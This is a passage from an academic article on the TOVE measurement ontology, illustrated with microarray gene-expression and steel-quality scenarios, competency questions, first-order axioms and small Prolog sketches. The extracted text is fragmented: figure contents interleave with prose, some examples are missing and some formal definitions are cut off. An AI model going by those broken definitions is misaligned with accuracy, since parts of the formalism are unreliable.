GNU (Nozick, Turnquist, Jones, Davis, & Lawton, 2004) projects. The same can be said for emerging domains, and examples include the measurement units represented in the
SEEK (ecology) (Bowers & Ludäscher, 2004), MGED (genomics) (Stoeckert Jr. & Parkinson, 2004), and PharmGKB (pharmacology) (Hewett et al., 2002) ontologies. Measurement theory is certainly more than just measurement unit conversions and quantities. Therefore, regardless of whether it is for traditional or emerging domains, or whether it is for the Semantic Web or closed networks, there is a definite research opportunity in developing an ontology that represents additional measurement common-sense. With such an ontology in tow, developers of Semantic Web ontologies of emerging domains as diverse as biology and geography have a reference for ensuring that important and subtle measurement concepts are diligently represented in their ontologies and not ignored. Ecolingua is an ontology for modeling ecological metadata (Brilhante & Robertson, 2001) and represents the important measurement notion of sampling. What is needed is a measurement ontology that, like Ecolingua, can be used for developing Semantic Web ontologies of emerging domains, but that represents even more. We believe that the TOVE measurement ontology (Fox, 1992) is one of the most extensive ontologies for enterprise modeling (Noy & Hafner, 1997). This article elaborates on what has previously been written about this measurement ontology. We first provide two scenarios for ontology use: one for the emerging domain of genomics using microarrays, and the other for the traditional domain of enterprise applications. We then present a demonstration of how the ontology can be used for these scenarios. The demonstration addresses two parallel audiences. We show how the ontology can be used by a scientist working in one of these emerging domains, e.g., a bioinformatician who seeks to discover significant gene-gene interactions in the presence of noise, missing data, and conflicting data. We further demonstrate that this can transparently be cast in terms of an enterprise domain. We then present arguments on the generalizability of the ontology.
Finally, we make concluding remarks and state our intentions for future work.
MEASUREMENT ONTOLOGY
Finkelstein (1984) defines measurement as the process by which numbers or symbols are assigned to attributes of entities in the real world in such a way as to describe them according to clearly defined rules. In a philosophical discussion of an ontology of measurement units, Mars (1993) summarizes the modern axiomatic treatment of the theory of measurement (Massey, 1971; Narens, 1985) as the problem of finding an axiomatic introduction of a function φ that assigns a numerical value to an object. Axioms of (1) ordering (a>b ↔ φ(a)≥φ(b), where > denotes an empirical ordering of objects) and (2) extension (φ(a)+φ(b) = φ(a•b), where • denotes an empirical combination of two objects) are central. These axioms are formal and sharable, since they are expressed in mathematics, and they represent fundamental measurement concepts. Fenton (1994) presents measurement as fundamental to ensuring software quality, and gives practical guidance in delineating the fundamentals of measurement into "what is measurement" (e.g., types: direct vs. indirect) and "issues for measurement" (e.g., which types of attributes can and cannot be measured, and on what kinds of scales). We synthesize these concepts using the motivation of a real-life enterprise application to transform abstract concepts into explicit ontology terms, definitions, and constraints. A graphical overview of the ontology development steps in the methodology that Gruninger and Fox (1995) used to engineer the TOVE Measurement Ontology representations is shown in Figure 1. These steps involve (1) developing a motivating scenario, (2) designing informal competency questions to capture the scenario, (3) formalizing them into formal competency questions, and (4) logically deducing answers to the competency questions as a demonstration of competency.
Figure 1. Ontology development steps in the TOVE methodology: informal competency questions (the questions that an ontology should be used to answer) are formalized into formal competency questions (schematically, of the form ∀A1 ∀A2 ∀Y { A1 ∧ A2 ⊃ Y }), which specify the capability of the ontology to support problem-solving tasks; terminology and axioms (formalizations that define and constrain the data model), together with a Prolog populated enterprise model, are then used for the demonstration of competency and evaluation of the ontology.
A motivating scenario is a detailed narrative about a specific enterprise, where emphasis is placed on problems or tasks it faces. When the scenario is analyzed, enterprise-independent, generic concepts are abstracted to state informal competency questions in natural language that bind the query capability or competency of the ontology. Terms with which such queries can be composed comprise the terminology or data model of the ontology. Queries re-stated using the terminology and restrictive syntax of the ontology are called formal competency questions. Answers to these questions can be logically deduced if axioms that define and constrain the terminology are developed as restrictive semantics. These deductions constitute a demonstration of competency. This methodology, which has posing and answering of informal and formal competency questions as its basis, is arguably the most popular ontology development methodology. According to a search via Google Scholar™ (scholar.google.com) in July 2005, Uschold and Gruninger's (1996) paper on ontological engineering is the fifth most cited paper on computational ontologies, and by far the most popular paper on ontology development methodology. This methodology has been applied to develop ontologies for fields as diverse as knowledge management (Gandon,
2001; Kim, 2002), bioinformatics (Stevens, Goble, & Bechhofer, 2000) and transportation engineering (Schlenoff, Balakirsky, Uschold, Provine, & Smith, 2003). These examples provide ample evidence that the methodology used to develop the measurement ontology can be used to develop ontologies of a wide variety of domains beyond enterprise modeling, the domain from which the ontology originates.
Motivating Scenario 1: Gene Expression Microarrays
Functional genomics is the study of gene function and of the relationships among genes. A multitude of perspectives exist as to the kinds of relationships—phenotypic expression, protein-protein interaction—but microarrays measuring gene expression levels are most commonly used. A number of promising discoveries in functional genomics can be made in areas that include drug discovery, biomarker determination, and biodiversity. We present a high-level description of microarrays here; a detailed description can be found in Mount (2004). To identify the primary concepts for the measurement aspects of microarrays, we consider some of the details of microarray analysis:
Figure 2. This graph depicts gene-gene relationships that have been experimentally determined (lines: thickness indicates strength). The two circles are uncharacterized genes. The small shapes are further annotations of information to help the emerging-domain scientist explore possible characterizations of the two uncharacterized genes.
Microarrays measure levels of associated substrate: one chemical species is fixed to a medium—a slide—and collections of other chemical species, which are fluorescently labeled, are brought into contact with the first. Those most strongly attracted adhere—this is called hybridization—and are then examined to estimate the degree of affinity by measuring the light intensities. Controls are added to give baseline indications of affinity, and trials are repeated to help establish the quality of results. Recent technological advances have made it possible to measure thousands of these relationships on a single slide.
There are a number of standard activities that take place when conducting microarray experiments. The substrates must be decided upon and procured, then fixed to the slides. The possible other substrates must be prepared by fluorescent labeling before hybridization. After exposure the slides must be washed of unbound substrates, scanned, and intensities displayed numerically.
Used cleverly, microarrays allow many kinds of relationships to be discovered. For example, given a set of genes, we may want to decide whether significant interactions exist among them. In the case of functional genomics, gene-gene interactions can be indirectly observed by measuring the amounts of RNA that bind to DNA fragments. Gene expression can be identified with one of four states: up-regulated (enhanced production), equally expressed, no observable change, and down-regulated (inhibited production). Historically, red, yellow, black, and green have been used, respectively, for these four states, with various intermediary colors representing a degree of mixing of these states. The final product then is a slide bearing a rectangular collection of tiny dots of color. These dots of color are actually ratios of probes labeled with two fluorophores, commonly cyanine 3 (Cy3), with peak absorption at 550 nm and emission at 570 nm, and cyanine 5 (Cy5), with peak absorption at 649 nm and emission at 670 nm. The ratio is Cy5:Cy3, where equal intensities of both show yellow, Cy5 > Cy3 shows red, Cy5 < Cy3 shows green, and black means neither is expressed. Microarrays are subject to numerous statistical variations brought about not only by the complex nature of the technology itself, but also by the sheer number of things being measured. To compare multiple runs, values must be further processed by, for example, normalization, and may include dimensions of time, light intensity, treatments, etc. To be at all useful, the quality of the output must be well known. Several methods are applied for improving quality, including sampling and repeated measurement of the same cell (repeat runs).
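To make the excerpt's ratio-to-state mapping concrete, it can be sketched as a few Prolog rules; this sketch is ours, the tolerance band is an assumed threshold, and it is not part of the TOVE ontology or of MIAME.

% Sketch of the Cy5:Cy3 ratio-to-state mapping described above.
% expression_state(+Cy5, +Cy3, -State): intensities are non-negative numbers.
expression_state(Cy5, Cy3, not_expressed) :-      % black: neither dye detected
    Cy5 =:= 0, Cy3 =:= 0, !.
expression_state(Cy5, Cy3, equally_expressed) :-  % yellow: comparable intensities
    Cy5 > 0, Cy3 > 0, Ratio is Cy5 / Cy3,
    Ratio >= 0.67, Ratio =< 1.5, !.               % assumed tolerance band
expression_state(Cy5, Cy3, up_regulated) :-       % red: Cy5 dominates
    Cy5 > Cy3, !.
expression_state(_, _, down_regulated).           % green: Cy3 dominates

For example, the query ?- expression_state(120, 40, S). yields S = up_regulated under this sketch.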
The key concept (C-1) abstracted from the first excerpt is the following:
C-1: There must be a systematic way of describing how a particular physical characteristic is to be measured, and this description must be used to meet the quality expectations of the scientists.
The concept that can be derived from the description of the activities involved in microarray analysis is the following:
C-2: Quality assessment is made through a system of activities, which perform measurement; this is a view of measurement as an activity.
Finally, considering the decision process that uses the measurements, the concept embedded in the decision-making process can be simply stated as:
C-3: Every quality assessment is a decision that begins with a value of measurement at a given point in time.
Motivating Scenario 2: BHP Steel
To show the applicability of the concepts, we take an alternative scenario from the more traditional standpoint of enterprise measurement. BHP Steel is an industrial collaborator for TOVE Measurement Ontology development. The following excerpt describes its losses with respect to cost, time, and revenue when products of unacceptable quality (called non-prime products) are produced.
As raw materials are transformed by the different production units of BHP Steel's supply chain, non-prime products may be produced. These are the products whose physical properties do not satisfy necessary tolerance specifications. Non-prime products lead to lost revenue due to re-grading and scrapping, increased costs due to additional rework, carrying of excess inventory to meet delivery promises, and increased variability of lead-time performance.
The same key concept (C-1) can be abstracted from this excerpt:
C-4: There must be a systematic way of describing how a particular physical characteristic is to be measured, and this description must be used to meet the customer's expectations of quality.
The next excerpt describes BHP Steel's need to understand and improve its inspection processes, the collection of activities that assess whether a product is non-prime.
If the products are consistently found to be non-prime, this is an indication that there is something faulty in the production unit. A cause for this occurrence is suspected to be an inadequate inspection process.
C-5: Quality assessment is made through a system of activities, which perform measurement. The following excerpt specifies what is entailed in determining a product as non-prime. Especially when the product is shipped to the customer, it is essential that the product satisfies the tolerance specifications of the customer. Therefore, the product’s physical characteristics are measured, compared against tolerance specifications and a decision about whether the product is non-prime is made. C-6: Every quality assessment uses a decision process that begins with a value of measurement at a given point in time.
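As an illustrative sketch only (the constant names, tolerance bounds, and measurement facts below are our assumptions, not BHP Steel's actual data or the ontology's exact predicates), the non-prime decision behind C-6 can be written down directly in Prolog:

% Assumed tolerance specification: attribute, lower bound, upper bound.
tolerance_spec(coil_length, 980, 1020).

% Assumed measurement points: product, attribute, measured value, time point.
measurement(coil_17, coil_length, 1013, t1).
measurement(coil_18, coil_length, 957,  t1).

% A product is non-prime at time Tp if some measured value falls outside
% the tolerance specification for that attribute.
non_prime(Product, Tp) :-
    measurement(Product, At, V, Tp),
    tolerance_spec(At, Low, High),
    ( V < Low ; V > High ).

A query such as ?- non_prime(P, t1). would then identify coil_18 as non-prime, mirroring the decision process described in the excerpt.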
Informal Competency Questions
Not only are the informal competency questions developed to elaborate the concepts, they are also designed from the findings of the review of measurement models.
Measurement Description System: To elaborate C-1, the transformation of the relationship between an entity and its attributes into the more tractable domain of terms, numbers, and operators must be modeled (Grady, 1993). The following, then, are informal competency questions (e.g., ICQ-1) about requirements:
• ICQ-1: Is this a quality requirement?
• ICQ-2: What are the physical characteristics that are measured?
In measuring physical characteristics, one important aspect is sampling, which occurs when a subset of a population of an evaluated entity is measured, rather than the whole (Scheaffer & McClave, 1982). The following are some questions for representing sampling:
• ICQ-3: Is every entity that is produced measured?
Figure 3. Measurement description system data model, relating (via has-subclass and has-attribute links) domain values, sample unit, sample population, unit population, attribute, measured attribute, sample size, attribute sampling, variable sampling, sampling plan, specification set, standard value, and unit of measurement.
• ICQ-4: If the product is a batch, is a sample taken from that batch and measured?
• ICQ-5: If a sample is taken and measured, is the value for the measurement some aggregate (e.g., average) of the measurement upon individual units of that sample?
• ICQ-6: Or, is the value of the measurement a measure of whether or not individual units of the sample passed or failed a certain threshold (e.g., does the sample in well 34 show up-regulation)?
• ICQ-7: What ought to be the measured value; that is, what is the expected value for that physical characteristic?
• ICQ-8: What are the tolerance specifications for a physical characteristic that is measured?
• ICQ-9: What is the unit of measurement for a physical characteristic of an entity?
Measurement Activities: In order to elaborate C-2, the following questions about measurement and inspection can be asked:
• ICQ-10: Is this an activity that performs measurement?
• ICQ-11: Is this an inspection activity?
Measurement Points: In order to elaborate C-3, the elemental piece of information needed
to make a quality assessment can be represented as the value of a measurement taken at a point in time. Following are questions about quality that build on this:
• ICQ-12: What is the measured value for a physical characteristic at a given point in time?
• ICQ-13: What are the measured values for a physical characteristic during a given period of time?
• ICQ-14: Is an entity of "good" quality at a given point in time?
• ICQ-15: Is an entity of "bad" quality at a given point in time?
• ICQ-16: Is an entity of conforming quality over a given period of time?
The terminology with which these questions can be more formally posed is developed next.
Terminology & Formal Competency Questions
TOVE Core Ontologies: TOVE measurement ontology terms are defined with propositions (or Boolean terms) from the TOVE Core Ontologies, which are founded upon a first-order language for representing dynamically changing worlds. This first-order language is called the situation calculus
Example 1.
Core-1 holds(f,s): Fluent f is true (i.e., holds) in situation s
Core-2 occursT(f,T): Fluent f occurs in time period T
Example 2.
Core-3 organization_agent(Oa): Oa is an organization agent, which seeks to achieve a goal in situation s
Core-4 (agent constraint): X denotes the entities that must be represented in order to represent the constraints on Oa (X is a vector with none, one, or more entities); c is the predicate name for the agent constraint; c(X) is a first-order logic expression for the constraint
Core-5 organizational_constraint(C): C is a unique identifier for each instance of c(X)
Example 3.
Core-6 resource(R): R is a resource
Core-7 tru(Rt): Rt is a traceable resource unit
Core-8 has_tru(R,Rt): Rt is an individual unit within R
Core-9 activity(A): A is an activity
Core-10 primitive_activity(A): A is a primitive activity
Core-11 has_subactivity(A,Ao): Ao is a subactivity in activity A
Core-12 consume_res_tru(A,Rt); consume_res_tru(A,R): activity A consumes tru Rt (or resource R)
Core-13 produce_res_tru(A,Rt); produce_res_tru(A,R): activity A produces tru Rt (or resource R)
Core-14 use_res_tru(A,Rt); use_res_tru(A,R): activity A uses tru Rt (or resource R)
Example 4.
Core-15 activity_duration(A,T): Activity A is performed within time T
Core-16 has_point(T,Tp): Tp is a time point in T
(McCarthy & Hayes, 1969). In situation calculus, each perturbation to the modeled world changes the world from one situation to another. If the truth value of a term, which describes an entity in this world or a relationship between entities, varies from situation to situation, then the term is a fluent . A fluent holds in a given situation, if the term is true in that situation. A fluent occurs in a given time period , if for all situations which
occur during that period, the fluent holds. Note that unless otherwise stated, all predicates of the ontology are fluents, e.g., the predicate presented as organization_agent(Oa) is actually expressed in the ontology as holds(organization_agent(Oa),s). Also, a variable or parameter of a term is denoted within brackets when the term is defined. denotes that ‘R’ is one of the variables of the term resource, e.g. if R=‘chair’ for the expres-
Example 5.
Core-17 has_subclass(X,Xo): Class X has a subclass Xo
Core-18 has_attribute(X,Ch): X has an attribute Ch
Core-19 has_attribute_value(X,Ch,V): Attribute Ch of object X has value V
(Here X denotes an object, Xo a subclass of X, Ch an attribute of X, and V the value of that attribute for X.)
Example 6.
Term-1 quality_requirement(Qr): Qr is a quality requirement
Term-2 measured_attribute(At): At is a measured attribute
Term-3 samples_attribute(Ch,At): At is a measured attribute sampled from Ch
Example 7.
Term-4 has_sample_sizing(At,Sz): Measured attribute At has sample size Sz
Term-5 has_sampling_plan(At,Sp): At has a sampling plan of type Sp
sion resource(R) then this is read as ‘a chair is a resource.’ See Example 1. An agent constraint is a special fluent representing a constraint upon an organization agent that must be satisfied in order for that agent to achieve some goal. See Example 2. Some agent constraints refer to use of resource —a conceptual or prototypical entity such as arm assembly—and tru (traceable resource unit) —a physical set of individual units of a resource, such as ‘lot#123 of arm assemblies’ (Kim, Fox, & Grüninger, 1999), or a microarray assay plate or reagents. An activity may consume trus of one resource to produce trus of another resource, and may use trus of yet another resource; if a tru is used, individual units of the resource that comprise it are not consumed so they are available for use after an activity’s execution. Activities can be hierarchically modeled as comprised of subactivities ; a primitive activity has no sub-activities. Core-12 can be interpreted as “consume resource or tru.” This
interpretation also holds for “produce” and “use.” See Example 3. The time duration within which an activity is performed can be represented as a sequential list of discrete time points . See Example 4. Finally, general object-oriented constructs are represented as seen in Example 5. Measurement Description System: A quality requirement specifies physical characteristics of a resource—e.g., “the number of genes examined or the number of probes used per gene”—that has a bearing on quality, as well as constraints that define acceptable quality. A measured attribute of a sample of a tru—e.g., “average light intensity and color”—is the explicit, exact descriptor of what is measured. So, the following are used to formally express ICQ-1 to ICQ-3. See Example 6. There are two additional issues regarding sampling:
• Sample Size: How many individuals in a set are measured to model the characteristics of the set?
• Sampling Plan: When determining an aggregate value from the sample, does it refer directly to the actual attribute that is physically measured, or is the reference indirect?

Example 10.
Term-14 conformance_pt(Q,Rt,At,Tp); Term-15 nonconformance_pt(Q,Rt,At,Tp): Q is a conformance/non-conformance point for tru Rt of attribute At, measured using measurement point Mp, at time point Tp.

Example 11.
Term-16 conforming_quality(X,Qr)
Therefore, the terms in Example 7 are used to express ICQ-4 to ICQ-6. To express ICQ-7 to ICQ-9, a standard value μ for what the value of a measured attribute ought to be is represented, as well as a function of μ and σ² (f(μ,σ²)) and an operator (⊗). The unit of measurement is also represented. For a measured attribute, a subset [μ−kσ², μ+kσ²], a generic term called a specification set, is represented, where elements of this subset denote acceptable measurement values. See Example 8.
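To give a feel for how such a populated model looks in practice, here is a small set of ground facts in the Prolog style of the TOVE populated enterprise model; the constant names (microarray_slide, qr_spot_intensity, mean_light_intensity, s_actual) are our own illustrative assumptions, and the argument order follows the Term-1 to Term-5 definitions above as we read them.

% Illustrative populated measurement description for the microarray scenario
% (all constants are assumed; the situation constant is s_actual).
holds(resource(microarray_slide), s_actual).
holds(has_attribute(microarray_slide, light_intensity), s_actual).
holds(quality_requirement(qr_spot_intensity), s_actual).
holds(measured_attribute(mean_light_intensity), s_actual).
holds(samples_attribute(light_intensity, mean_light_intensity), s_actual).
holds(has_sample_sizing(mean_light_intensity, sample), s_actual).
holds(has_sampling_plan(mean_light_intensity, attribute_sampling), s_actual).

A query in the spirit of ICQ-2, ?- holds(measured_attribute(At), s_actual)., then returns At = mean_light_intensity.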
Measurement Activities: The simplest measurement action is the measurement of one measured attribute of one tru at one point in time. When this measurement is performed using a special resource called a measuring resource, this activity is a primitive measure activity. A primitive measure activity or an aggregation of primitive measure activities is a measure activity. An inspection and test activity is a form of a measure activity. The following terms then are used to formally express ICQ-10 and ICQ-11. See Example 9. Measurement Point: To formally express ICQ-12 and ICQ-13, the result of a measurement activity is represented using a measurement point, relating the value of the measurement and, concomitantly, the measured attribute, the time of measurement, and the tru measured. See Example 10. The following term then represents the concept that "quality is conformance to requirements." See Example 11.
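The link between conformance points and conforming quality (ICQ-14 to ICQ-16) can likewise be sketched with a toy rule; this is a deliberately naive reading of ours, not the TOVE definition, and the time and tru constants are invented.

% Toy conformance/non-conformance points for tru lot123 and attribute
% mean_light_intensity at time points t1..t3 (all constants assumed).
holds(conformance_pt(q1, lot123, mean_light_intensity, t1), s_actual).
holds(conformance_pt(q2, lot123, mean_light_intensity, t2), s_actual).
holds(nonconformance_pt(q3, lot123, mean_light_intensity, t3), s_actual).

% Naive reading of "conforming quality over a period": at least one
% conformance point and no non-conformance point for the tru/attribute pair.
conforming_over_period(Rt, At, S) :-
    holds(conformance_pt(_, Rt, At, _), S),
    \+ holds(nonconformance_pt(_, Rt, At, _), S).

Under these facts, ?- conforming_over_period(lot123, mean_light_intensity, s_actual). fails because of the non-conformance point at t3.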
Example 12.
CQ-1: Does there exist a quality requirement 'θρ'¹ in a situation 'σ'?
holds(quality_requirement('θρ'),σ).
CQ-2: Does there exist a measured attribute for a tru 'κ' in a situation 'σ'?
Using these terms, ICQ-14 to ICQ-16 are expressed. Informal competency questions are stated formally next.
Formal Competency Questions
For brevity, only the competency questions for the measurement description system are presented. The informal competency question is re-stated in English using the terminology developed from the ontology, then expressed formally in first-order logic. Measurement Description System: See Example 12.
Axioms
The axioms in the ontology are presented next. Once again, we only describe the axioms for the measurement description system, for lack of space. Measurement Description System: A categorical characterization of the content of all quality requirements is difficult; axioms about quality requirements true for all enterprises in all industries are not likely to exist. Rather, quality requirement is stated as a primitive term (PT)—a
term that is instantiated and stated as a fact in the populated enterprise model—in the TOVE measurement ontology. That is, the enterprise modeler determines that a given agent constraint is a quality requirement and states this as a fact. All definition (Defn) axioms are ultimately formally defined in terms of primitive terms. By applying constraint (Cons) axioms, proper use of primitive terms is enforced. Primitive terms are populated (instantiated) as ground terms; e.g. a fact that ‘widget’ is a resource is represented as a ground term, resource (widget), which is an instance of the primitive term, resource(R). Measured attribute and samples attribute are also primitive terms. The quality of an activity is evaluated by the quality of resources associated with that activity; and the quality of a resource (prototypical product) is gauged by the quality of trus comprised of individual units of that resource. The constraint axioms in Example 13 express this. These axioms ensure valid answers for ICQ-2. Additional such constraints constrain the use of the primitive terms has_sample_sizing, has_sampling_plan, has_standard_value, has_specification_set, and has_unit_of_measurement. The
Example 13.
Cons-1: A measured attribute must be an attribute of a tru.
Cons-2: A measured attribute must be sampled from an attribute of a resource.
∀At ∀s [ holds(measured_attribute(At),s) → ∃Atr ∃R ( holds(samples_attribute(Atr,At),s) ∧ holds(has_attribute(R,Atr),s) ∧ holds(resource(R),s) ) ].
(Here At is the measured attribute, Atr the attribute sampled for At, Rt the tru for which At is an attribute, R the resource for which Atr is an attribute, and s an extant or hypothetical situation.)
Example 14.
Cons-3: All measured attributes must have a specification set, and the standard value for that measured attribute must be an element of the specification set.
(The parameters of this axiom denote the upper and lower bounds of a specification set for a measured attribute of ratio scale, a set of "acceptable" values for the measured attribute, the standard value for At, and an extant or hypothetical situation.)
axiom in Example 14 ensures valid answers for ICQ-8.
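To make the role of such constraint axioms concrete, a checking rule in the spirit of Cons-2 can be sketched in Prolog; this is our sketch under a closed-world reading of a populated model, not the TOVE axiom itself, and the predicate name violates_cons2 is hypothetical.

% Report measured attributes that violate Cons-2 in situation S, i.e.,
% attributes that are not sampled from an attribute of some resource.
violates_cons2(At, S) :-
    holds(measured_attribute(At), S),
    \+ ( holds(samples_attribute(Atr, At), S),
         holds(has_attribute(R, Atr), S),
         holds(resource(R), S) ).

Run against the populated facts sketched above, the query ?- violates_cons2(At, s_actual). fails, i.e., no violation is reported, because mean_light_intensity samples light_intensity, an attribute of the resource microarray_slide.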
DEMONSTRATION OF COMPETENCY
A demonstration of competency entails using the TOVE ontological engineering methodology for the following:
• Microarray Analysis: Does the ontology support problem-solving tasks for a specific pathway—wing development in Drosophila melanogaster?
• Ontology Development: Are the ontology's competency questions—which by design do not refer to any specific domain—answered, thus demonstrating that the ontology can be used to support similar problem-solving tasks for other domains?
The first question characterizes requirements for an analyst familiar with the domain, not with the ontology's language or representations; the second question is relevant for an engineer with expertise in ontology-based enterprise modeling who is unfamiliar with details of the specific domain modeled. An advisor is a user interface and a set of access routines serving as front-end software to an ontology-based enterprise model. Table 1 lists how an advisor answers the two different questions. We now describe how each of the steps in Table 1 manifests in the ontology by identifying parts of the motivating scenarios that correspond to ontology predicates (see Table 2). This can be demonstrated computationally using the ISO 9000 Quality Advisor (Kim &
Table 1. Steps for using an advisor for demonstrating competency (left: Bioinformatician View, using the advisor to analyze a specific enterprise; right: Ontology Builder View, using the advisor to evaluate the competency of the ontology)
Step 1: Stating facts about experimental conditions ⇔ Representing the populated enterprise model
Step 2: Stating explicit gene-gene relationships ⇔ Representing formal competency questions
Step 3: Stating a data dictionary of experimental terms ⇔ Representing ontology terminology and axioms
Step 4: Answering queries ⇔ Deducing answers to formal competency questions
(⇔ denotes translation between knowledge about an enterprise and how that knowledge is represented using an ontology)
Table 2.
#1 Stating facts about the process ⇔ Representing the populated model
Emerging: "collections are fluorescently labeled" ⇔ holds(activity(process_fl_label), sw_actual)
Traditional: "There are many activities…" from Motivating Scenario ⇔ holds(activity(process_wp_hcpf_260_1), sv_actual).
#2 Stating queries for analyzing the process ⇔ Representing formal competency questions
Emerging: "Is this an activity in which a specific gene is determined to be underexpressed?" ⇔ holds(inspect_and_test(α),σ).
Traditional: "Is this an activity in which products are determined to be non-prime?" ⇔ holds(inspect_and_test(α),σ).
#3 Stating a data dictionary of the actual process's terms ⇔ Representing ontology terminology and axioms
Emerging: "An activity where a gene is determined to be unexpressed is an inspect and test activity according to the TOVE Measurement Ontology"; "The inspections are done through an activity which measures the average light intensity for a specific cell using a light sensor" ⇔ holds(inspect_and_test(Cij), s)
Traditional: "The inspections are done through an activity which measures the average coil length using a sensor." ⇔ holds(inspect_and_test(A),s) ≡ …
Fox, 2002), a tool for evaluating ISO 9000 compliance of an enterprise modeled using ontologies. Evaluation entails answering questions about an enterprise’s inspection and measurement system, so it can be used for enterprise analysis, as well as for assessing the competency of the measurement ontology. A complete demonstration of competency using all of the components of the ontology is beyond the scope of this article because of length restrictions. A full demonstration is shown in (Kim, 1999), which also includes a demonstration of generalizability of the measurement ontology.
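For illustration only, the deduction pattern of Table 2 can be mimicked with a deliberately simplified Prolog model; the rule below is our toy stand-in for the ontology's actual definition of an inspect-and-test activity (which this article does not reproduce), and the constants purpose and acceptance_decision are assumptions.

% Toy populated model in the style of Table 2 (fact names assumed).
holds(activity(process_fl_label), sw_actual).
holds(measure_activity(process_fl_label), sw_actual).
holds(has_attribute_value(process_fl_label, purpose, acceptance_decision), sw_actual).

% Toy stand-in: a measure activity whose purpose is an acceptance decision
% counts as an inspect-and-test activity.
holds(inspect_and_test(A), S) :-
    holds(measure_activity(A), S),
    holds(has_attribute_value(A, purpose, acceptance_decision), S).

% ?- holds(inspect_and_test(A), sw_actual).
% A = process_fl_label.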
COMMENTARY ON GENERALIZABILITY
In our full demonstration of generalizability (Kim, 1999), we show that the measurement ontology's representations can be used to perform tasks similar to those of a related application. Specifically, it is shown that parts of SAP's quality control management model (SAP-AG, 1995) can be reasonably "reduced" to, or represented using, only ontology representations. The implication then is that a query answerable using the SAP™ data model is answerable as a competency question posed and answered using the ontology. That is, the ontology is as "competent" as SAP™ with respect to the reduced set of competency questions. Whereas that demonstration provides evidence of intra-domain, inter-application generalizability of the ontology (using different models, or ontologies, in a similar domain), what we have shown in Table 2 provides evidence of inter-domain, intra-application generalizability (using the same model, or ontology, for different domains). That is, we show that the same set of general measurement representations can be used to pose and answer competency questions from two different domains. We cannot claim that the measurement ontology can be a "plug-and-play" ontology for
all other domains. Rather, we can claim that the ontology’s representations can be used to define terms and express axioms for more domain-specific ontologies. The basis of this claim is the core of the methodology used: competency questions. If informal competency questions associated with a specific domain can be reasonably posed as formal competency questions represented using measurement ontology representations, we can make an inductive argument that the measurement ontology is generalizable to that domain. To that end, we show in Table 3 how the informal competency questions from measuring the quality of service (QoS) of Web services and agriculture (tracking cattle) domains relate to the informal competency questions that motivated this ontology. It is evident then that the measurement ontology can serve as a very re-usable, generalizable basis to develop more committed ontologies of highly diverse fields, from measuring QoS to tracking cattle.
CONCLUDING REMARKS
There is clearly a need for an ontology that represents both the obvious and the more subtle fundamental concepts in measurement. This is certainly true in emerging domains like bioinformatics, where quality plays such a vital and critical role in discovery. A measurement ontology is particularly useful for builders of Semantic Web ontologies of emerging domains because of the importance of measurement in these domains, which are firmly grounded in the physical sciences. The measurement concepts represented in this article are summarized as follows:
• A system for assessing measurements includes the appropriate measured attribute, as well as its standard value (μ), sampling plan and size, specification set of "acceptable values" of f(μ,σ²), and unit of measurement. Measurements of attributes are recorded
Table 3. (Columns: manufacturing informal competency question, the basis for the measurement ontology; measuring QoS for Web services; tracking cattle via RFID)
ICQ-2: What is the physical characteristic that is measured?
• Measuring QoS for Web services: What is the QoS metric that is measured? The answer could be mean response time, and facts could be represented using the ontology as has_attribute(message121, response_time) and measured_attribute(mean_response_time).
• Tracking cattle via RFID: Which data about beef quality need to be collected? The answer could be fat thickness, and facts could be represented using the ontology as has_attribute(cowcarcass1871, fat_thickness).
ICQ-3: Is every entity that is produced measured?
• Measuring QoS for Web services: Is the response time for every message measured? The answer would be yes, represented as has_sample_sizing(mean_response_time, sample_population) to signify that the population is sampled, i.e., response times for all packets that comprise a message are calculated. If only some packets were sampled, this would be represented as has_sample_sizing(mean_response_time, sample).
• Tracking cattle via RFID: Is every carcass measured? The answer would be yes, represented as has_sample_sizing(fat_thickness, unit_sample) to signify that each unit is sampled.
ICQ-5: If a sample is taken and measured, is the value for the measurement some aggregate (e.g., average) of the measurement upon individual units of that sample?
• Measuring QoS for Web services: Are the response times for a message averaged? The answer is yes, since the mean response time for a message is the average of the response times of all packets that comprise that message. This would be represented as samples_attribute(mean_response_time, response_time) and has_sampling_plan(mean_response_time, attribute_sampling).
• Tracking cattle via RFID: Is the mean fat thickness of each carcass from a lot averaged? The answer is no, since fat thickness is tracked individually and not associated with the lots that identify the herd of origin.
as measurement points in time that are assigned a value as a result of some measurement activity. These representations are the basic ones necessary to model any form of measurement.
• Quality can be represented as some composition of conformance points, which are "conforming" measurement points with respect to some quality requirement. Representing quality requirements, measurement points, and conformance points makes it possible to model and assess any entity within an enterprise as of conforming quality.
These concepts are formally represented by posing competency questions, analyzing the domain of measurement, stating assumptions, and developing terminology and axioms. Then, the competency of the ontology and its capability for use to gain insights about an enterprise are demonstrated by automatically deducing answers to questions such as:
• Quality Assessment System Competency Questions: What is the standard value for a given measured attribute of an entity? What is its specification set? How is the measured attribute sampled?
• Measurement and Conformance Points Competency Questions: What is the measurement point for a measured attribute? Is it a conformance point? Over a period of time, is an entity of conforming quality?
Measurement theory is more than just measurement unit conversions and quantities. The root of our contribution is that we present an ontology that represents more concepts than other ontologies. This general ontology is then a useful reference regardless of whether it serves as a building
block for traditional or emerging domains, or for the Semantic Web or closed networks. With such an ontology in tow, developers of Semantic Web ontologies of emerging domains as diverse as biology and geography have a reference for ensuring that important and subtle measurement concepts are diligently represented in their ontologies and not ignored. The clear future direction for this work is to (1) transform this ontology so that its representations are more general, and that ontological commitment made towards enterprise applications is further abstracted out; (2) develop separate domain specific ontologies of emerging domains that actually define and restrict their terms using the general ontology developed in (1) (as opposed to the realistic use of this ontology, which is to serve as inspiration and reference); and (3) implement both the general and the domain specific ontologies in the de facto ontology language of the Semantic Web, OWL. Overall we believe that we have inspired builders of emerging domain ontologies to incorporate important common-sense of their domains—that of obvious and subtle measurement concepts—in their ontologies, so that their ontologies will be more robust and sharable for functioning on the Semantic Web.
REFERENCES
Allen, J. F. (1983). Maintaining knowledge about temporal intervals. Communications of the ACM, 26(11), 832-843.
Ashburner, M., Ball, C., Blake, J., Botstein, D., Butler, H., Cherry, J., et al. (2000). Gene ontology: Tool for the unification of biology. Nature Genetics, 25, 25-29.
Attie, A. D. (2003). The new industrialized approach to biology. Cell Biology Education, 2, 150-151.
Bechhofer, S., Goble, C., & Horrocks, I. (2001, July 30-August 1). DAML+OIL is not enough. Paper presented at the First Semantic Web Working Symposium (SWWS-01), Stanford, CA.
Berners-Lee, T., Hendler, J., & Lassila, O. (2001). The Semantic Web. Scientific American, 284(5), 34-43.
